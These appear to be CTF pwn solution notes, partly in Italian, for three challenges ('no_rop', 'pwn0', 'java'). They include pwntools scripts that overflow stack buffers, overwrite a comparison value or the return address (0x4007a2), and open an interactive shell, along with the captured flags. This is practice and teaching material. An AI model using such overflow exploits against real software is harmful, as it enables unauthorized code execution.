1)no_rop
  Enter the password : 
  123456789123456789123456789
  Correct password! 
  Flag={hello_world_pwn}
  Errore di segmentazione (core dump creato)

2)pwn0
  Script.py
    from pwn import*
    p=process('./pwn0')
    garbage="A"*64
    attack="H!gh"
    
    payload=garbage+ attack
    
    p.sendline(payload)
    print(p.recvall())

  =>b"How's the josh?\nGood! here's the flag\nencryptCTF{L3t5_R4!53_7h3_J05H}\n"

3)java

STACK:
  RIP => 8Bytes
  RBP => 8Bytes
  user.call=> 8Bytes
  array[32]

    from pwn import *
    p=process('./java')
    target = p64(0x4007a2)
    
    payload = b'java' + b'A'*(28) + target  #nota: importante perchè così il programma non termina e posso usare la bash in santa pace
    #payload = payload.encode("ascii")
    msgin = payload + target
    p = process("./java")
    p.sendline(payload)
    p.interactive()

  
